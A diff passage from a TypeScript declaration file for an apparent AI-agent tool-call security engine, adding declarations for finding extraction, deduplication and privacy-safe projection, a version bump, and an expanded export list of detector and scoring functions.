declare function extractCanonicalFindings(call: ToolCallEntry, ctx: ExtractContext): CanonicalFinding[];
|
|
923
|
+
declare function extractSessionLevelFindings(calls: ReadonlyArray<SessionToolCall>, ctx: SessionExtractContext): CanonicalFinding[];
|
|
924
|
+
/**
|
|
925
|
+
* Collapse equivalent findings into one row, summing occurrenceCount and
|
|
926
|
+
* spreading firstSeenAt / lastSeenAt across the matches. Dedupe key is
|
|
927
|
+
* (type, ruleName, command-preview, project, agent) — same shape scan.ts
|
|
928
|
+
* uses today (line 502), with `agent` added so cross-agent matches stay
|
|
929
|
+
* separated for the dashboard's per-agent breakdown.
|
|
930
|
+
*/
|
|
931
|
+
declare function dedupeCanonicalFindings(findings: ReadonlyArray<CanonicalFinding>): CanonicalFinding[];
|
|
932
|
+
/**
|
|
933
|
+
* Project a CanonicalFinding into the privacy-safe ScanFinding shape the
|
|
934
|
+
* proxy sends to the SaaS. Drops `input`, `redactedSample`, `commandPreview`,
|
|
935
|
+
* `subjectPath` — anything that could carry user content. Counts and pattern
|
|
936
|
+
* names only, matching the privacy invariant in scan/index.ts.
|
|
937
|
+
*
|
|
938
|
+
* Returns null if the type doesn't have a corresponding ScanFinding bucket
|
|
939
|
+
* (currently `smart-rule` and `ast-fs-op` — those carry a user-defined or
|
|
940
|
+
* shield rule name and aren't part of the count-based summary).
|
|
941
|
+
*/
|
|
942
|
+
declare function toScanFinding(c: CanonicalFinding): ScanFinding | null;
|
|
943
|
+
declare function previewArgs(input: Record<string, unknown>, max: number): string;
|
|
944
|
+
|
|
412
945
|
/** Engine version stamped on audit entries for future drift detection. */
|
|
413
|
-
declare const ENGINE_VERSION = "1.0.0";
|
|
946
|
+
declare const ENGINE_VERSION = "1.4.0";
|
|
414
947
|
|
|
415
|
-
export { BUILTIN_SHIELDS, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, FLAGS_WITH_VALUES, LOOP_MAX_RECORDS, type LoopWindowEvaluation, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SENSITIVE_PATH_REGEXES, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallRecord, analyzePipeChain, analyzeShellCommand, checkDangerousSql, computeArgsHash, detectDangerousEval, detectDangerousShellExec, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractNetworkTargets, extractPositionalArgs, getCompiledRegex, getNestedValue, isIgnoredTool, isShieldVerdict, matchSensitivePath, matchesPattern, normalizeCommandForPolicy, parseAllSshHostsFromCommand, redactText, scanArgs, scanText, sensitivePathMatch, validateOverrides, validateRegex, validateShieldDefinition };
|
|
948
|
+
export { AST_FS_REGEX_RULES, type AuditEntryForClassify, BASH_TOOL_NAMES, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, CANONICAL_EXTRACTOR_HASH, CANONICAL_EXTRACTOR_VERSION, COST_PER_LOOP_ITER_USD, type CanonicalAgent, type CanonicalFinding, type CanonicalFindingType, type CanonicalSourceType, DESTRUCTIVE_OP_RE, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, type ExtractContext, FILE_TOOLS, FLAGS_WITH_VALUES, type FsOpVerdict, LONG_OUTPUT_THRESHOLD_BYTES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, PRIVILEGE_ESCALATION_RE, type PiiPattern, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_RE, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type SessionExtractContext, type SessionToolCall, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallEntry, type ToolCallRecord, analyzeFsOperation, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, dedupeCanonicalFindings, detectDangerousEval, detectDangerousShellExec, detectPii, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractCanonicalFindings, extractNetworkTargets, extractPositionalArgs, extractSessionLevelFindings, getCompiledRegex, getNestedValue, isBashTool, isIgnoredTool, isProtectedHomePath, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, previewArgs, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, toScanFinding, truncateBlastPath, 
validateOverrides, validateRegex, validateShieldDefinition };
|